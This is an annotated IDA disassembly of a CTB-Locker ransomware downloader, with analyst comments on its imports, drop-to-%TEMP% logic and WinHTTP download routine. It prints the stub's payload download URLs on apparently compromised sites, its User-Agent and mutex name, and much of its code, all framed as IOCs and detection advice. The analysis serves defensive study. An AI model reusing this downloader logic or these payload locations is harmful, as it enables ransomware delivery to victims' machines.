.idata:00401000                   ;
.idata:00401000                   ; +-------------------------------------------------------------------------+
.idata:00401000                   ; |     This file is generated by The Interactive Disassembler (IDA)        |
.idata:00401000                   ; |     Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com>        |
.idata:00401000                   ; | Licensed to:                                                            |
.idata:00401000                   ; +-------------------------------------------------------------------------+
.idata:00401000                   ;
.idata:00401000                   ; Input MD5   : 48C9B4DBFB4B163B0ABB03F74E1834B1
.idata:00401000
.idata:00401000                   ; File Name   : CTB-Locker_downloader.bin
.idata:00401000                   ; Format      : Portable executable for 80386 (PE)
.idata:00401000                   ; Imagebase   : 400000
.idata:00401000                   ; Section 1. (virtual address 00001000)
.idata:00401000                   ; Virtual size                  : 00001110 (   4368.)
.idata:00401000                   ; Section size in file          : 00001200 (   4608.)
.idata:00401000                   ; Offset to raw data for section: 00000200
.idata:00401000                   ; Flags E0000020: Text Executable Readable Writable
.idata:00401000                   ; Alignment     : default
.idata:00401000                   ;
.idata:00401000                   ; Imports from KERNEL32.dll
.idata:00401000                   ;
.idata:00401000
.idata:00401000                   ; NOTE(review): IDA listing in MASM syntax, 32-bit flat model (.686p/.model flat,
.idata:00401000                   ; PE for 80386 per the header). This is a disassembly dump, not assemblable
.idata:00401000                   ; source: the address and byte columns are listing chrome, and the analyst
.idata:00401000                   ; comments below are triage notes for this CTB-Locker downloader stub.
.idata:00401000                                   include uni.inc ; see unicode subdir of ida for info on unicode
.idata:00401000
.idata:00401000                                   .686p
.idata:00401000                                   .mmx
.idata:00401000                                   .model flat
.idata:00401000
.idata:00401000                   ; ===========================================================================
.idata:00401000
.idata:00401000                   ; Segment type: Externs
.idata:00401000                   ; _idata
.idata:00401000                   ; NOTE(review): static import table of the dropper stub. Only 20 KERNEL32
.idata:00401000                   ; exports plus USER32!MessageBoxA are linked here; the WINHTTP, SETUPAPI,
.idata:00401000                   ; SHELL32, SHLWAPI and ADVAPI32 functions used for download, CAB handling,
.idata:00401000                   ; execution and string formatting are resolved at run time in
.idata:00401000                   ; LoadUsefullLibraries via LoadLibraryA/GetProcAddress (name strings at
.idata:00401000                   ; 00401310..00401440). A capability triage from this table alone under-counts.
.idata:00401000                   ; The per-import notes give the observed caller and security-relevant role;
.idata:00401000                   ; call sites that lie past the end of this excerpt are marked as such.
.idata:00401000                   ; void __stdcall ExitProcess(UINT uExitCode)
.idata:00401000                   ; Terminates the stub; ErrorMsgBox calls it right after its MessageBoxA, so every
.idata:00401000                   ; failure path in start (codes 3E8h..3EAh pushed before ErrorMsgBox) ends here.
.idata:00401000 ?? ?? ?? ??                       extrn ExitProcess:dword ; CODE XREF: start+24Dp
.idata:00401000                                                           ; ErrorMsgBox+3Ep
.idata:00401000                                                           ; DATA XREF: ...
.idata:00401004                   ; HRSRC __stdcall FindResourceA(HMODULE hModule, LPCSTR lpName, LPCSTR lpType)
.idata:00401004                   ; Locates the embedded payload: type "DATA" (004011C8), ID 3E9h (1001). Tried
.idata:00401004                   ; first with the hModule passed to start, then with GetModuleHandleA(NULL)
.idata:00401004                   ; (start+AF..+E5). The first stage is carried as a PE resource, not downloaded.
.idata:00401004 ?? ?? ?? ??                       extrn FindResourceA:dword
.idata:00401004                                                           ; CODE XREF: start+BCp
.idata:00401004                                                           ; start+D7p
.idata:00401004                                                           ; DATA XREF: ...
.idata:00401008                   ; HGLOBAL __stdcall LoadResource(HMODULE hModule, HRSRC hResInfo)
.idata:00401008                   ; Maps the resource; a NULL result pushes error 3E9h and exits via ErrorMsgBox.
.idata:00401008 ?? ?? ?? ??                       extrn LoadResource:dword
.idata:00401008                                                           ; CODE XREF: start+F2p
.idata:00401008                                                           ; start+FEp
.idata:00401008                                                           ; DATA XREF: ...
.idata:0040100C                   ; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
.idata:0040100C                   ; Releases the VirtualAlloc'd scratch buffers (start, downloadPayload).
.idata:0040100C ?? ?? ?? ??                       extrn VirtualFree:dword ; CODE XREF: start+2A0p
.idata:0040100C                                                           ; downloadPayload+199p
.idata:0040100C                                                           ; DATA XREF: ...
.idata:00401010                   ; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
.idata:00401010                   ; start+1A8 dumps the locked resource bytes (pointer from LockResource, length
.idata:00401010                   ; from SizeofResource) into the file created in %TEMP%. executePayload writes a
.idata:00401010                   ; second file; that call site is outside this excerpt, contents unknown from here.
.idata:00401010 ?? ?? ?? ??                       extrn WriteFile:dword   ; CODE XREF: start+1A8p
.idata:00401010                                                           ; executePayload+75p
.idata:00401010                                                           ; DATA XREF: ...
.idata:00401014                   ; void __stdcall Sleep(DWORD dwMilliseconds)
.idata:00401014                   ; Delays at start+264/+2BC (past this excerpt); durations not visible here.
.idata:00401014                   ; Note the local named dwMilliseconds in start is reused to hold the resource
.idata:00401014                   ; size (start+12A), so the IDA name is misleading for the visible code.
.idata:00401014 ?? ?? ?? ??                       extrn Sleep:dword       ; CODE XREF: start+264p
.idata:00401014                                                           ; start+2BCp ...
.idata:00401018                   ; DWORD __stdcall SizeofResource(HMODULE hModule, HRSRC hResInfo)
.idata:00401018                   ; Size of the embedded payload; becomes nNumberOfBytesToWrite for the drop.
.idata:00401018 ?? ?? ?? ??                       extrn SizeofResource:dword
.idata:00401018                                                           ; CODE XREF: start+11Ep
.idata:00401018                                                           ; DATA XREF: start+11Er
.idata:0040101C                   ; DWORD __stdcall GetModuleFileNameW(HMODULE hModule, LPWCH lpFilename, DWORD nSize)
.idata:0040101C                   ; start+1D0, just past this excerpt; likely retrieves the stub's own path (the
.idata:0040101C                   ; Filename local, 0A4Ch bytes below ebp) — purpose not visible here, confirm.
.idata:0040101C ?? ?? ?? ??                       extrn GetModuleFileNameW:dword
.idata:0040101C                                                           ; CODE XREF: start+1D0p
.idata:0040101C                                                           ; DATA XREF: start+1D0r
.idata:00401020                   ; HANDLE __stdcall CreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
.idata:00401020                   ; start+185 creates the drop file with GENERIC_WRITE (40000000h), FILE_SHARE_READ
.idata:00401020                   ; (1), CREATE_ALWAYS (2), FILE_ATTRIBUTE_NORMAL (80h). Path = GetTempPathW result
.idata:00401020                   ; + BuildCredibleFileName output via "%s%s", so the file lands in %TEMP% under a
.idata:00401020                   ; generated name rather than a fixed one. Second use in executePayload.
.idata:00401020 ?? ?? ?? ??                       extrn CreateFileW:dword ; CODE XREF: start+185p
.idata:00401020                                                           ; executePayload+5Bp
.idata:00401020                                                           ; DATA XREF: ...
.idata:00401024                   ; int __stdcall lstrlenW(LPCWSTR lpString)
.idata:00401024                   ; Wide-string length helper (CallBackFileCAB, downloadPayload).
.idata:00401024 ?? ?? ?? ??                       extrn lstrlenW:dword    ; CODE XREF: CallBackFileCAB+2Bp
.idata:00401024                                                           ; downloadPayload+52p ...
.idata:00401028                   ; DWORD __stdcall GetTempPathW(DWORD nBufferLength, LPWSTR lpBuffer)
.idata:00401028                   ; Fills lpMemBlock2 with %TEMP% (drop directory). nBufferLength is passed as
.idata:00401028                   ; 200h WCHARs against a 200h-BYTE VirtualAlloc — an author bug that is harmless
.idata:00401028                   ; only because VirtualAlloc rounds the allocation up to a page.
.idata:00401028 ?? ?? ?? ??                       extrn GetTempPathW:dword
.idata:00401028                                                           ; CODE XREF: start+12Ep
.idata:00401028                                                           ; DATA XREF: start+12Er
.idata:0040102C                   ; DWORD __stdcall GetLastError()
.idata:0040102C                   ; start+23F, immediately after CreateMutexA (start+239), both past this excerpt:
.idata:0040102C                   ; consistent with an ERROR_ALREADY_EXISTS single-instance check — confirm.
.idata:0040102C ?? ?? ?? ??                       extrn GetLastError:dword
.idata:0040102C                                                           ; CODE XREF: start+23Fp
.idata:0040102C                                                           ; DATA XREF: start+23Fr
.idata:00401030                   ; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
.idata:00401030                   ; Run-time import resolution in LoadUsefullLibraries; results are stored in
.idata:00401030                   ; lpf* globals (e.g. lpfwnsprintfW at 00401EFC, called from start+162).
.idata:00401030 ?? ?? ?? ??                       extrn GetProcAddress:dword
.idata:00401030                                                           ; CODE XREF: LoadUsefullLibraries+7Bp
.idata:00401030                                                           ; LoadUsefullLibraries+88p ...
.idata:00401034                   ; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
.idata:00401034                   ; Five MEM_COMMIT (1000h) / PAGE_READWRITE (4) allocations at start+5F..+A7: three
.idata:00401034                   ; of 200h bytes (lpMemBlock1/2/3) plus 0Ch and 10h bytes whose return values are
.idata:00401034                   ; not stored in the visible code. All RW — no RWX allocation for in-memory
.idata:00401034                   ; shellcode is visible in this excerpt.
.idata:00401034 ?? ?? ?? ??                       extrn VirtualAlloc:dword
.idata:00401034                                                           ; CODE XREF: start+75p
.idata:00401034                                                           ; start+82p ...
.idata:00401038                   ; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
.idata:00401038                   ; Loads SHLWAPI/SETUPAPI/SHELL32/WINHTTP/ADVAPI32 by name (LoadUsefullLibraries).
.idata:00401038 ?? ?? ?? ??                       extrn LoadLibraryA:dword
.idata:00401038                                                           ; CODE XREF: LoadUsefullLibraries+11p
.idata:00401038                                                           ; LoadUsefullLibraries+1Ap ...
.idata:0040103C                   ; LPVOID __stdcall LockResource(HGLOBAL hResData)
.idata:0040103C                   ; Yields the payload pointer that WriteFile copies to disk.
.idata:0040103C ?? ?? ?? ??                       extrn LockResource:dword
.idata:0040103C                                                           ; CODE XREF: start+113p
.idata:0040103C                                                           ; DATA XREF: start+113r
.idata:00401040                   ; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
.idata:00401040                   ; Called with NULL (edi) to get the stub's own base for the resource fallback.
.idata:00401040 ?? ?? ?? ??                       extrn GetModuleHandleA:dword
.idata:00401040                                                           ; CODE XREF: start+D0p
.idata:00401040                                                           ; start+EBp
.idata:00401040                                                           ; DATA XREF: ...
.idata:00401044                   ; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCSTR lpName)
.idata:00401044                   ; start+239, past this excerpt. The 9-byte string "pokjuszo" (004011BC) is copied
.idata:00401044                   ; into the local Name buffer at start+1E..+59, presumably as the mutex name: a
.idata:00401044                   ; host IOC and, if the code aborts on ERROR_ALREADY_EXISTS, a vaccination handle.
.idata:00401044 ?? ?? ?? ??                       extrn CreateMutexA:dword
.idata:00401044                                                           ; CODE XREF: start+239p
.idata:00401044                                                           ; DATA XREF: start+239r
.idata:00401048                   ; BOOL __stdcall CloseHandle(HANDLE hObject)
.idata:00401048                   ; Closes the drop file right after WriteFile (start+1AF) and in executePayload.
.idata:00401048 ?? ?? ?? ??                       extrn CloseHandle:dword ; CODE XREF: start+1AFp
.idata:00401048                                                           ; executePayload+7Ep
.idata:00401048                                                           ; DATA XREF: ...
.idata:0040104C                   ; BOOL __stdcall DeleteFileW(LPCWSTR lpFileName)
.idata:0040104C                   ; executePayload+C3 (past this excerpt): removes a file after launch — likely the
.idata:0040104C                   ; dropped/extracted file, so it may not survive on disk for collection; confirm.
.idata:0040104C ?? ?? ?? ??                       extrn DeleteFileW:dword ; CODE XREF: executePayload+C3p
.idata:0040104C                                                           ; DATA XREF: executePayload+C3r
.idata:00401050
.idata:00401054                   ;
.idata:00401054                   ; Imports from USER32.dll
.idata:00401054                   ;
.idata:00401054                   ; int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
.idata:00401054                   ; ErrorMsgBox shows "Error code #%d" with caption "Error" before ExitProcess. A
.idata:00401054                   ; visible "Error" box with code 1000..1002 in a sandbox means the stub aborted
.idata:00401054                   ; before dropping or downloading anything.
.idata:00401054 ?? ?? ?? ??                       extrn MessageBoxA:dword ; CODE XREF: ErrorMsgBox+36p
.idata:00401054                                                           ; DATA XREF: ErrorMsgBox+36r
.idata:00401054
.idata:00401054
.text:00401058                   ; ===========================================================================
.text:00401058
.text:00401058                   ; Segment type: Pure code
.text:00401058                   ; Segment permissions: Read/Write/Execute
.text:00401058                   ; NOTE(review): one RWX section (header: Flags E0000020) holds the import table
.text:00401058                   ; (.idata at 00401000), the string data and the code. Compiler/linker output
.text:00401058                   ; normally separates these with W^X permissions; a single writable+executable
.text:00401058                   ; section is consistent with a hand-built or packer-emitted stub and is a cheap
.text:00401058                   ; static triage heuristic on its own.
.text:00401058                   _text           segment para public 'CODE' use32
.text:00401058                                   assume cs:_text
.text:00401058                                   ;org 401058h
.text:00401058                                   assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
.text:00401058 00 00 00 00 00 00+                align 10h
.text:00401060                   ; NOTE(review): payload download locations (network IOCs). Five host/path pairs
.text:00401060                   ; with no URL scheme, all ending in abc.tar.gz. start builds a local table of
.text:00401060                   ; {pointer, length-in-WCHARs} pairs from them (var_38..var_14; the word values
.text:00401060                   ; 24h/1Dh/23h/23h/20h match the string lengths). downloadPayload references "/"
.text:00401060                   ; (00401468) and "%s" (00401460), presumably to split host from path for
.text:00401060                   ; WinHttpConnect/WinHttpOpenRequest — confirm there; it is outside this excerpt.
.text:00401060                   ; The hosts look like ordinary third-party sites (likely compromised rather than
.text:00401060                   ; attacker-registered): block on the full paths, not just the domains.
.text:00401060                   aShopOye_itXxxi:                        ; DATA XREF: start+32o
.text:00401060 73 00 68 00 6F 00+                unicode 0, <shop-oye.it/XXXinstallXXX/abc.tar.gz>,0
.text:004010AA 00 00                             align 4
.text:004010AC                   aAspiroflash_fr:                        ; DATA XREF: start+39o
.text:004010AC 61 00 73 00 70 00+                unicode 0, <aspiroflash.fr/cai/abc.tar.gz>,0
.text:004010E8                   aDieideenwerkst:                        ; DATA XREF: start+40o
.text:004010E8 64 00 69 00 65 00+                unicode 0, <dieideenwerkstatt.at/css/abc.tar.gz>,0
.text:00401130                   aFirststepbaham:                        ; DATA XREF: start+47o
.text:00401130 66 00 69 00 72 00+                unicode 0, <firststepbahamas.com/PDF/abc.tar.gz>,0
.text:00401178                   aWymianaWsb_cba:                        ; DATA XREF: start+4Eo
.text:00401178 77 00 79 00 6D 00+                unicode 0, <wymiana-wsb.cba.pl/pp/abc.tar.gz>,0
.text:004011BA 00 00                             align 4
.text:004011BC                   ; "pokjuszo": 8 chars + NUL = 9 bytes, copied into the local Name buffer in start
.text:004011BC                   ; (movsd/movsd/movsb at start+1E..+59). CreateMutexA is called at start+239, past
.text:004011BC                   ; this excerpt, so this is presumably the mutex name: a host IOC and, if the code
.text:004011BC                   ; aborts when GetLastError (start+23F) reports ERROR_ALREADY_EXISTS, a vaccine.
.text:004011BC 70 6F 6B 6A 75 73+aPokjuszo       db 'pokjuszo',0         ; DATA XREF: start+16o
.text:004011C5 00 00 00                          align 4
.text:004011C8                   ; char Type[]
.text:004011C8                   ; Resource type of the embedded payload; paired with ID 3E9h (1001) in the
.text:004011C8                   ; FindResourceA calls at start+AF/+C5. To extract statically: type "DATA", id 1001.
.text:004011C8 44 41 54 41 00    Type            db 'DATA',0             ; DATA XREF: start+AFo
.text:004011C8                                                           ; start+C5o
.text:004011CD 00 00 00                          align 10h
.text:004011D0                   ; Drop-path format: wnsprintfW("%s%s", <GetTempPathW buffer>, <BuildCredibleFileName
.text:004011D0                   ; output>) at start+162, i.e. %TEMP% + generated name; reused in executePayload.
.text:004011D0                   aSS:                                    ; DATA XREF: start+155o
.text:004011D0                                                           ; executePayload+2Eo
.text:004011D0 25 00 73 00 25 00+                unicode 0, <%s%s>,0
.text:004011DA 00 00                             align 4
.text:004011DC                   ; Alphabets for BuildCredibleFileName: vowels plus '.', consonants, and a run of
.text:004011DC                   ; 37 three-letter extensions (txt rtf doc ... exe dll). The dropped file therefore
.text:004011DC                   ; appears to get a pronounceable pseudo-random name with a common extension; do
.text:004011DC                   ; not key detection on a .cab suffix in %TEMP%. Selection logic is outside this
.text:004011DC                   ; excerpt (start passes 9 and 0 as the other two arguments at start+13B).
.text:004011DC                   aAeoiuy_:                               ; DATA XREF: BuildCredibleFileName+Co
.text:004011DC 61 00 65 00 6F 00+                unicode 0, <aeoiuy.>,0
.text:004011EC                   aQwrtpsdfghjklz:                        ; DATA XREF: BuildCredibleFileName+24o
.text:004011EC 71 00 77 00 72 00+                unicode 0, <qwrtpsdfghjklzxcvbnm>,0
.text:00401216 00 00                             align 4
.text:00401218                   aTxtrtfdocchmhl:                        ; DATA XREF: BuildCredibleFileName+37o
.text:00401218 74 00 78 00 74 00+                unicode 0, <txtrtfdocchmhlpttfpdffb2xlspptmdbcdawavwmamp3avimpgmdvflv>
.text:00401218 72 00 74 00 66 00+                unicode 0, <swfwmvvobbmpgifjpgpngisomdfmdsbindatnrg3gpoggvobexedll>,0
.text:004012F8                   ; ErrorMsgBox text/caption. start pushes 3E8h (resource not found), 3E9h
.text:004012F8                   ; (LoadResource failed) or 3EAh (CreateFileW failed) before calling it, so a
.text:004012F8                   ; visible "Error code #1000..#1002" box means the stub aborted before the drop.
.text:004012F8 45 72 72 6F 72 20+aErrorCodeD     db 'Error code #%d',0   ; DATA XREF: ErrorMsgBox+12o
.text:00401307 00                                align 4
.text:00401308                   ; char Caption[]
.text:00401308 45 72 72 6F 72 00 Caption         db 'Error',0            ; DATA XREF: ErrorMsgBox+28o
.text:0040130E 00 00                             align 10h
.text:00401310                   ; Run-time resolved imports (LoadUsefullLibraries: LoadLibraryA + GetProcAddress),
.text:00401310                   ; invisible in the static import table: SHLWAPI (wnsprintfA/W, StrStrIW); SETUPAPI
.text:00401310                   ; (SetupIterateCabinetW — presumably enumerates the dropped file as a CAB through
.text:00401310                   ; CallBackFileCAB); SHELL32 (ShellExecuteW — presumably how executePayload launches
.text:00401310                   ; the extracted file); WINHTTP (the full download stack, see downloadPayload);
.text:00401310                   ; ADVAPI32 (SystemFunction036, the RtlGenRandom export — presumably the RNG behind
.text:00401310                   ; BuildCredibleFileName). Resolved pointers land in lpf* globals such as
.text:00401310                   ; lpfwnsprintfW (00401EFC). Hunt on the GetProcAddress string set, not the IAT.
.text:00401310                   ; char LibFileName[]
.text:00401310 53 48 4C 57 41 50+LibFileName     db 'SHLWAPI.DLL',0      ; DATA XREF: LoadUsefullLibraries+Co
.text:0040131C                   ; char aSetupapi_dll[]
.text:0040131C 53 45 54 55 50 41+aSetupapi_dll   db 'SETUPAPI.DLL',0     ; DATA XREF: LoadUsefullLibraries+13o
.text:00401329 00 00 00                          align 4
.text:0040132C                   ; char aShell32_dll[]
.text:0040132C 53 48 45 4C 4C 33+aShell32_dll    db 'SHELL32.DLL',0      ; DATA XREF: LoadUsefullLibraries+1Co
.text:00401338                   ; char aWinhttp_dll[]
.text:00401338 57 49 4E 48 54 54+aWinhttp_dll    db 'WINHTTP.DLL',0      ; DATA XREF: LoadUsefullLibraries+25o
.text:00401344                   ; char aAdvapi32_dll[]
.text:00401344 41 44 56 41 50 49+aAdvapi32_dll   db 'ADVAPI32.DLL',0     ; DATA XREF: LoadUsefullLibraries+30o
.text:00401351 00 00 00                          align 4
.text:00401354                   ; char ProcName[]
.text:00401354 77 6E 73 70 72 69+ProcName        db 'wnsprintfA',0       ; DATA XREF: LoadUsefullLibraries+75o
.text:0040135F 00                                align 10h
.text:00401360                   ; char aWnsprintfw[]
.text:00401360 77 6E 73 70 72 69+aWnsprintfw     db 'wnsprintfW',0       ; DATA XREF: LoadUsefullLibraries+7Do
.text:0040136B 00                                align 4
.text:0040136C                   ; char aSetupiterateca[]
.text:0040136C 53 65 74 75 70 49+aSetupiterateca db 'SetupIterateCabinetW',0
.text:0040136C 74 65 72 61 74 65+                                        ; DATA XREF: LoadUsefullLibraries+8Ao
.text:00401381 00 00 00                          align 4
.text:00401384                   ; char aShellexecutew[]
.text:00401384 53 68 65 6C 6C 45+aShellexecutew  db 'ShellExecuteW',0    ; DATA XREF: LoadUsefullLibraries+97o
.text:00401392 00 00                             align 4
.text:00401394                   ; char aStrstriw[]
.text:00401394 53 74 72 53 74 72+aStrstriw       db 'StrStrIW',0         ; DATA XREF: LoadUsefullLibraries+A7o
.text:0040139D 00 00 00                          align 10h
.text:004013A0                   ; char aSystemfunction[]
.text:004013A0 53 79 73 74 65 6D+aSystemfunction db 'SystemFunction036',0
.text:004013A0 46 75 6E 63 74 69+                                        ; DATA XREF: LoadUsefullLibraries+B4o
.text:004013B2 00 00                             align 4
.text:004013B4                   ; char aWinhttpqueryda[]
.text:004013B4 57 69 6E 48 74 74+aWinhttpqueryda db 'WinHttpQueryDataAvailable',0
.text:004013B4 70 51 75 65 72 79+                                        ; DATA XREF: LoadUsefullLibraries+C4o
.text:004013CE 00 00                             align 10h
.text:004013D0                   ; char aWinhttpreceive[]
.text:004013D0 57 69 6E 48 74 74+aWinhttpreceive db 'WinHttpReceiveResponse',0
.text:004013D0 70 52 65 63 65 69+                                        ; DATA XREF: LoadUsefullLibraries+D1o
.text:004013E7 00                                align 4
.text:004013E8                   ; char aWinhttpsendreq[]
.text:004013E8 57 69 6E 48 74 74+aWinhttpsendreq db 'WinHttpSendRequest',0
.text:004013E8 70 53 65 6E 64 52+                                        ; DATA XREF: LoadUsefullLibraries+DEo
.text:004013FB 00                                align 4
.text:004013FC                   ; char aWinhttpsetopti[]
.text:004013FC 57 69 6E 48 74 74+aWinhttpsetopti db 'WinHttpSetOption',0 ; DATA XREF: LoadUsefullLibraries+EBo
.text:0040140D 00 00 00                          align 10h
.text:00401410                   ; char aWinhttpopenreq[]
.text:00401410 57 69 6E 48 74 74+aWinhttpopenreq db 'WinHttpOpenRequest',0
.text:00401410 70 4F 70 65 6E 52+                                        ; DATA XREF: LoadUsefullLibraries+F8o
.text:00401423 00                                align 4
.text:00401424                   ; char aWinhttpconnect[]
.text:00401424 57 69 6E 48 74 74+aWinhttpconnect db 'WinHttpConnect',0   ; DATA XREF: LoadUsefullLibraries+105o
.text:00401433 00                                align 4
.text:00401434                   ; char aWinhttpopen[]
.text:00401434 57 69 6E 48 74 74+aWinhttpopen    db 'WinHttpOpen',0      ; DATA XREF: LoadUsefullLibraries+112o
.text:00401440                   ; char aWinhttpreaddat[]
.text:00401440 57 69 6E 48 74 74+aWinhttpreaddat db 'WinHttpReadData',0  ; DATA XREF: LoadUsefullLibraries+11Fo
.text:00401450                   ; "%s%s.%s" in CallBackFileCAB: presumably <dir><name>.<ext> for a cabinet member
.text:00401450                   ; being written out — confirm; the callback is outside this excerpt.
.text:00401450                   aSS_S:                                  ; DATA XREF: CallBackFileCAB+87o
.text:00401450 25 00 73 00 25 00+                unicode 0, <%s%s.%s>,0
.text:00401460                   aS:                                     ; DATA XREF: CallBackFileCAB+A2o
.text:00401460                                                           ; downloadPayload+1Bo
.text:00401460 25 00 73 00 00 00                 unicode 0, <%s>,0
.text:00401466 00 00                             align 4
.text:00401468                   asc_401468:                             ; DATA XREF: downloadPayload+Co
.text:00401468 2F 00 00 00                       unicode 0, </>,0
.text:0040146C 00 00 00 00                       align 10h
.text:00401470                   ; Spoofed User-Agent (IE7 on Windows NT 6.0) for the WinHTTP GET. It is a fixed
.text:00401470                   ; static string: a reliable proxy/IDS signature when paired with the abc.tar.gz
.text:00401470                   ; request paths above.
.text:00401470                   aMozilla4_0Comp:                        ; DATA XREF: downloadPayload+69o
.text:00401470 4D 00 6F 00 7A 00+                unicode 0, <Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)>,0
.text:004014D6 00 00                             align 4
.text:004014D8                   ; HTTP verb for WinHttpOpenRequest (downloadPayload+B6).
.text:004014D8                   aGet:                                   ; DATA XREF: downloadPayload+B6o
.text:004014D8 47 00 45 00 54 00+                unicode 0, <GET>,0
.text:004014E0
.text:004014E0                   ; =============== S U B R O U T I N E =======================================
.text:004014E0
.text:004014E0                   ; Attributes: noreturn bp-based frame
.text:004014E0
.text:004014E0                   ; int __cdecl start(HMODULE hModule)
.text:004014E0                                   public start
.text:004014E0                   start           proc near
.text:004014E0
.text:004014E0                   Filename        = word ptr -0A4Ch
.text:004014E0                   FileName        = word ptr -64Ch
.text:004014E0                   var_24C         = byte ptr -24Ch
.text:004014E0                   Name            = byte ptr -44h
.text:004014E0                   lpString        = dword ptr -38h
.text:004014E0                   var_34          = word ptr -34h
.text:004014E0                   var_30          = dword ptr -30h
.text:004014E0                   var_2C          = word ptr -2Ch
.text:004014E0                   var_28          = dword ptr -28h
.text:004014E0                   var_24          = word ptr -24h
.text:004014E0                   var_20          = dword ptr -20h
.text:004014E0                   var_1C          = word ptr -1Ch
.text:004014E0                   var_18          = dword ptr -18h
.text:004014E0                   var_14          = word ptr -14h
.text:004014E0                   NumberOfBytesWritten= dword ptr -10h
.text:004014E0                   var_C           = dword ptr -0Ch
.text:004014E0                   lpBuffer        = dword ptr -8
.text:004014E0                   dwMilliseconds  = dword ptr -4
.text:004014E0                   hModule         = dword ptr  8
.text:004014E0
.text:004014E0 55                                push    ebp
.text:004014E1 8B EC                             mov     ebp, esp
.text:004014E3 81 EC 4C 0A 00 00                 sub     esp, 0A4Ch
.text:004014E9 53                                push    ebx
.text:004014EA 56                                push    esi
.text:004014EB 57                                push    edi
.text:004014EC 6A 24                             push    24h
.text:004014EE 58                                pop     eax
.text:004014EF 6A 1D                             push    1Dh
.text:004014F1 66 89 45 CC                       mov     [ebp+var_34], ax
.text:004014F5 58                                pop     eax
.text:004014F6 BE BC 11 40 00                    mov     esi, offset aPokjuszo ; "pokjuszo"
.text:004014FB 8D 7D BC                          lea     edi, [ebp+Name]
.text:004014FE A5                                movsd
.text:004014FF 6A 23                             push    23h
.text:00401501 66 89 45 D4                       mov     [ebp+var_2C], ax
.text:00401505 58                                pop     eax
.text:00401506 A5                                movsd
.text:00401507 66 89 45 DC                       mov     [ebp+var_24], ax
.text:0040150B 66 89 45 E4                       mov     [ebp+var_1C], ax
.text:0040150F 6A 20                             push    20h
.text:00401511 58                                pop     eax
.text:00401512 C7 45 C8 60 10 40+                mov     [ebp+lpString], offset aShopOye_itXxxi ; "shop-oye.it/XXXinstallXXX/abc.tar.gz"
.text:00401519 C7 45 D0 AC 10 40+                mov     [ebp+var_30], offset aAspiroflash_fr ; "aspiroflash.fr/cai/abc.tar.gz"
.text:00401520 C7 45 D8 E8 10 40+                mov     [ebp+var_28], offset aDieideenwerkst ; "dieideenwerkstatt.at/css/abc.tar.gz"
.text:00401527 C7 45 E0 30 11 40+                mov     [ebp+var_20], offset aFirststepbaham ; "firststepbahamas.com/PDF/abc.tar.gz"
.text:0040152E C7 45 E8 78 11 40+                mov     [ebp+var_18], offset aWymianaWsb_cba ; "wymiana-wsb.cba.pl/pp/abc.tar.gz"
.text:00401535 66 89 45 EC                       mov     [ebp+var_14], ax
.text:00401539 A4                                movsb
.text:0040153A E8 85 04 00 00                    call    LoadUsefullLibraries
.text:0040153F 8B 35 34 10 40 00                 mov     esi, VirtualAlloc
.text:00401545 6A 04                             push    4               ; flProtect
.text:00401547 BF 00 10 00 00                    mov     edi, 1000h
.text:0040154C 57                                push    edi             ; flAllocationType
.text:0040154D BB 00 02 00 00                    mov     ebx, 200h
.text:00401552 53                                push    ebx             ; dwSize
.text:00401553 6A 00                             push    0               ; lpAddress
.text:00401555 FF D6                             call    esi ; VirtualAlloc
.text:00401557 6A 04                             push    4               ; flProtect
.text:00401559 57                                push    edi             ; flAllocationType
.text:0040155A 53                                push    ebx             ; dwSize
.text:0040155B 6A 00                             push    0               ; lpAddress
.text:0040155D A3 F8 1E 40 00                    mov     lpMemBlock1, eax
.text:00401562 FF D6                             call    esi ; VirtualAlloc
.text:00401564 6A 04                             push    4               ; flProtect
.text:00401566 57                                push    edi             ; flAllocationType
.text:00401567 53                                push    ebx             ; dwSize
.text:00401568 6A 00                             push    0               ; lpAddress
.text:0040156A A3 D8 1E 40 00                    mov     lpMemBlock2, eax
.text:0040156F FF D6                             call    esi ; VirtualAlloc
.text:00401571 6A 04                             push    4               ; flProtect
.text:00401573 57                                push    edi             ; flAllocationType
.text:00401574 6A 0C                             push    0Ch             ; dwSize
.text:00401576 6A 00                             push    0               ; lpAddress
.text:00401578 A3 EC 1E 40 00                    mov     lpMemBlock3, eax
.text:0040157D FF D6                             call    esi ; VirtualAlloc
.text:0040157F 6A 04                             push    4               ; flProtect
.text:00401581 57                                push    edi             ; flAllocationType
.text:00401582 6A 10                             push    10h             ; dwSize
.text:00401584 33 FF                             xor     edi, edi
.text:00401586 57                                push    edi             ; lpAddress
.text:00401587 FF D6                             call    esi ; VirtualAlloc
.text:00401589 8B 35 04 10 40 00                 mov     esi, FindResourceA
.text:0040158F 68 C8 11 40 00                    push    offset Type     ; "DATA"
.text:00401594 68 E9 03 00 00                    push    3E9h            ; lpName
.text:00401599 FF 75 08                          push    [ebp+hModule]   ; hModule
.text:0040159C FF D6                             call    esi ; FindResourceA
.text:0040159E 89 45 F8                          mov     [ebp+lpBuffer], eax
.text:004015A1 3B C7                             cmp     eax, edi
.text:004015A3 75 35                             jnz     short loc_4015DA
.text:004015A5 68 C8 11 40 00                    push    offset Type     ; "DATA"
.text:004015AA 68 E9 03 00 00                    push    3E9h            ; lpName
.text:004015AF 57                                push    edi             ; lpModuleName
.text:004015B0 FF 15 40 10 40 00                 call    GetModuleHandleA
.text:004015B6 50                                push    eax             ; hModule
.text:004015B7 FF D6                             call    esi ; FindResourceA
.text:004015B9 8B F0                             mov     esi, eax
